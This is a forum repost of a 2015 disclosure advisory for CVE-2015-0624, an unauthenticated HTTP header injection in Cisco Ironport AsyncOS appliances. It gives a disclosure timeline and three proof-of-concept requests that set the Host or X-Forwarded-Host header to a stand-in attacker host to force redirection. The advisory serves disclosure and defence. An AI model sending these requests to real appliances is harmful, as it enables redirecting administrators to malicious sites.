Jump to content
Aerosol

Cisco Ironport AsyncOS HTTP Header Injection

Recommended Posts

Cisco Ironport AsyncOS HTTP Header Injection
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
Cisco Ironport ESA - AsyncOS 8.0.1-023
Cisco Ironport WSA - AsyncOS 8.5.5-021
Cisco Ironport SMA - AsyncOS 8.4.0-138
Date: 24/02/2015
Credits: Glafkos Charalambous
CVE: CVE-2015-0624

Disclosure Timeline:
28-10-2014: Vendor Notification
28-10-2014: Vendor Response/Feedback
22-01-2015: Vendor Fix/Patch
20-02-2015: Vendor Advisory Release
24-02-2015: Public Disclosure

Description:
Cisco AsyncOS is vulnerable to unauthenticated HTTP Header Injection, caused by improper validation
of user supplied input when handling HTTP Host and X-Forwarded-Host request headers.

An attacker is able to inject crafted HTTP headers that could cause a web page redirection to a
malicious website.

PoC #1

GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Content-Length: 0
Host: ironport:8443:@[attacker.com]

PoC #2

GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Content-Length: 0
Host: [attacker.com]

PoC #3

GET https://ironport:8443/monitor/wsa_user_report HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Host: ironport:8443
X-Forwarded-Host: [attacker.com]


References:
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2015-0624


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (MingW32)

mQENBFE6TCMBCADQKVLT3xkJDQpUE6M3akJdFRWgFEy2pwoDbnOGDhw6yQYObDEuUlixRV5u
xaIwzh9xPSS36B72bhQC3isHuqDu3xVhx9OX7XlLheXDZJdRbNIXQ3YPk1uYQizuoIpHq08x
Eq4V2CXq7ovZPhWI6+iJt6QkVYvZXJdyoTKT8bLaFSOEfLeyAgkCQdXOgnzmNWeedxp0xGAj
KL7qIhLETp/MK46ndo5hF8RIbVs59gWdu4GxXr96qViJLiAYO1dQNLc+LShMnue91neTjLoe
JkpgqLfEGKV459eCJNqxlylIVbxyTmigExftZKAdNFHat0txK0fB/bLOwRnNFqYWQxanABEB
AAG0KEdsYWZrb3MgQ2hhcmFsYW1ib3VzIDxnbGFma29zQGdtYWlsLmNvbT6JATgEEwECACIF
AlE6TCMCGw8GCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEHAhLSD814yOAcoIALO6d2AQ
M0l9KD9hPIody4VYOgY8stBrumI+t8njzJOYCCLdzB781vCAa0vINPFuFxGp2e8EfMfvf8+Z
S6kC8EOQ6XyC8eq6imc1Q+tFMwTgykJZPFdosfXjBwg9jos/CR4dI6RZuzGC/FdXjpTAypbE
n3m2a+DBb6CUPeB9nVQq6ukRGbuZ8S+veWRNFwKkTSwC0HKtf9Od+JBrLKesNa3LWLo8q7+d
V3VS8rf8cmOOGBuaITzj87iRpgAgkF3MATa1Vb2nbbdYMpvHbzoj62mSqRiyEp1SOY9XkgcL
2ORsjgjww7GpH3F8LFvaHSHVz+037+E/+i/OSTS7o6gY4eI=
=yiro
-----END PGP SIGNATURE-----

Source

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...